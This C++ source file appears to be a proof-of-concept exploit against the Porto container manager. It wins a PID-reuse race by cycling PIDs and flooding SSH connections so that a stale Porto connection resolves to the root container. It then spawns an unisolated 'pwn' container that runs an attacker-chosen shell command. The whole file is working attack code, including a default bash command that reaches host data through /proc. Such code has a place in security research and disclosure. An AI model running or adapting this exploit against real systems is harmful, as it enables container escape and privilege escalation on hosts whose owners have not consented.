#include <cerrno>

#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <unistd.h>

#include <util/system/env.h>
#include <util/thread/pool.h>
#include <util/generic/scope.h>
#include <util/network/socket.h>

#include <library/cpp/getopt/last_getopt.h>
#include <security/pocs/porto/pidrace/portoapi/libporto.hpp>


namespace {
    // cyclePIDs() prints a progress marker whenever the freshly allocated PID
    // is a multiple of this value (64 * 1024).
    const int kReportEvery = 64 << 10;

    // Scratch stack handed to every short-lived clone() child. Callers pass
    // the top of the buffer (exit_stack + sizeof(exit_stack)) and wait for the
    // child before cloning again, so one buffer is reused for all of them.
    // clone(2) requires a suitably aligned stack pointer; a plain char array
    // gives no such guarantee, hence the explicit 16-byte alignment (the size
    // is a multiple of 16, so the top of the buffer is aligned as well).
    alignas(16) char exit_stack[8192];

    // Entry point for the throw-away clone() children: terminates the calling
    // task at once with status 0 through the raw exit system call. The
    // argument is ignored.
    int exit_fn(void *dummy) {
        static_cast<void>(dummy);
        syscall(SYS_exit, 0);
        // Only reached if the system call itself returns.
        return 0;
    }

    // Burns through PIDs by repeatedly cloning a child that exits immediately,
    // until the most recently allocated PID lies in
    // [targetPID - pidStopDistance, targetPID).
    //
    // targetPID       - PID the allocation should end up just below.
    // pidStopDistance - how far below targetPID to stop; a distance that is not
    //                   smaller than targetPID is clamped so the lower bound
    //                   becomes 0 instead of wrapping around.
    //
    // Throws TSystemError when clone() fails.
    void cyclePIDs(ui32 targetPID, ui32 pidStopDistance) {
        Cout << "current pid is " << getpid() << "...";
        Cout.Flush();

        // Unsigned subtraction would wrap to a huge value when the distance is
        // not smaller than the target, and the loop below would never finish.
        const ui32 minPID = pidStopDistance < targetPID ? targetPID - pidStopDistance : 0;

        ui32 child = 0;
        bool overlap = false;
        while (true) {
            const int cloned = clone(exit_fn, exit_stack + sizeof(exit_stack),
                                     CLONE_FILES | CLONE_FS | CLONE_IO |
                                     CLONE_SIGHAND | CLONE_SYSVSEM |
                                     CLONE_VM | SIGCHLD, nullptr);
            if (cloned < 0) {
                // Without this check -1 would be stored as a huge unsigned PID,
                // waitpid() would wait for any child, and the loop could spin
                // forever without allocating a single PID.
                ythrow TSystemError() << "can't clone";
            }

            // Reap the child before the shared stack is reused.
            waitpid(cloned, nullptr, 0);
            child = static_cast<ui32>(cloned);

            // The first PID observed below the target arms the stop condition
            // (presumably this means PID allocation has wrapped around).
            if (child < targetPID) {
                overlap = true;
            }

            if (overlap && child >= minPID) {
                break;
            }

            if (child % static_cast<ui32>(kReportEvery) == 0) {
                Cout << child << "...";
                Cout.Flush();
            }
        }

        Cout << Endl;
        Cout << "closing in to target_pid " << targetPID << ": Got child PID " << child << Endl;
    }

    // Schedules `count` tasks on `queue`. Each task opens a socket to port 22
    // of `target` (the TDuration::Seconds(1) argument is presumably the
    // connect timeout), keeps it for two seconds and then lets it go out of
    // scope. Failures inside a task are ignored.
    void dialHost(IThreadPool *queue, const TString &target, size_t count) {
        const auto holdConnection = [target]() {
            try {
                TSocket socket(TNetworkAddress(target, 22), TDuration::Seconds(1));
                sleep(2);
            } catch (...) {
                // best effort: a failed connection attempt is simply dropped
            }
        };

        size_t remaining = count;
        while (remaining > 0) {
            queue->SafeAddFunc(holdConnection);
            --remaining;
        }
    }

    std::pair<pid_t, int> dialPorto() {
        int fd = socket(AF_UNIX, SOCK_STREAM | SOCK_CLOEXEC, 0);
        if (fd < 0) {
            ythrow TSystemError() << "can't create socket";
        }

        int pid = fork();
        if (pid < 0) {
            ythrow TSystemError() << "can't fork";
        }

        if (pid == 0) {
            Porto::TPortoApi api{fd};
            if (api.Connect()) {
                ythrow yexception() << "connection failed: " << api.GetLastError();
            }

            _exit(0);
        }
        waitpid(pid, nullptr, 0);

        return {pid, fd};
    }
}


int main(int argc, char **argv) {
    NLastGetopt::TOpts opts = NLastGetopt::TOpts::Default();
    TString hostAddr = GetEnv("PORTO_HOST");
    opts.AddLongOption("host", "host addr to connect for forking")
            .DefaultValue(hostAddr)
            .StoreResult(&hostAddr);

    size_t hostCons = 100;
    opts.AddLongOption("host-cons", "host cons")
            .DefaultValue(hostCons)
            .StoreResult(&hostCons);

    ui32 pidStopDistance = 5000;
    opts.AddLongOption("pid-stop-distance", "pid stop distance")
            .DefaultValue(pidStopDistance)
            .StoreResult(&pidStopDistance);

    TString command = "bash -c 'portoctl list 2> /proc/$(pgrep pidrace)/root/err 1> /proc/$(pgrep pidrace)/root/out; portoctl destroy self'";
    opts.AddLongOption("command", "command to run")
            .DefaultValue(command)
            .StoreResult(&command);

    NLastGetopt::TOptsParseResult args(&opts, argc, argv);

    // deal with wrap around calculations
    Cout << "skip first 16k pids" << Endl;
    for (ui32 i = 0; i <= (16 << 10); ++i) {
        clone(exit_fn, exit_stack + sizeof(exit_stack),
              CLONE_FILES | CLONE_FS | CLONE_IO |
              CLONE_SIGHAND | CLONE_SYSVSEM |
              CLONE_VM | SIGCHLD, nullptr);
        wait(nullptr);
    }

    Cout << "spawn thread pool for later host connections" << Endl;
    THolder<IThreadPool> hostQueue = CreateThreadPool(hostCons, hostCons + 1);
    Y_DEFER {
        hostQueue->Stop();
    };

    Cout << "call porto" << Endl;
    auto[targetPID, portoFD] = dialPorto();
    Cout << "got porto conn fd " << portoFD << " from pid " << targetPID << Endl;
    Porto::TPortoApi api{portoFD};

    Cout << "let's recycle pids" << Endl;
    cyclePIDs(targetPID, pidStopDistance);

    Cout << "dial host (connect to '" << hostAddr << ":22' which is forked on accept) && call porto" << Endl;
    TString selfName;
    Porto::EError err;
    for (int i = 0; i < 1024; i++) {
        Cout << "try #" << i << Endl;

        dialHost(hostQueue.Get(), hostAddr, hostCons);
        // too lazy to implement signaling
        sleep(1);

        err = api.GetProperty("self", "absolute_name", selfName);
        if (err) {
            Cout << "nope: " << api.GetLastError() << Endl;
            continue;
        }

        Cout << "resolve 'self' container: " << selfName << Endl;
        if (selfName != "/") {
            continue;
        }

        Cout << "yay, it's root container, nice. let's spawn our command: " << command << Endl;

        Porto::TContainerSpec pwnContainer;
        pwnContainer.set_name("self/pwn-" + ToString(Now().ToString()));
        pwnContainer.set_isolate(false);
        pwnContainer.set_weak(false);
        pwnContainer.set_command(command);
        err = api.CreateFromSpec(pwnContainer, {}, true);
        if (err) {
            Cout << "can't start container: " << api.GetLastError() << Endl;
            continue;
        }

        Cout << "check this out" << Endl;
        return 0;
    }

    Cout << "something goes wrong :(" << Endl;
    return 0;
}
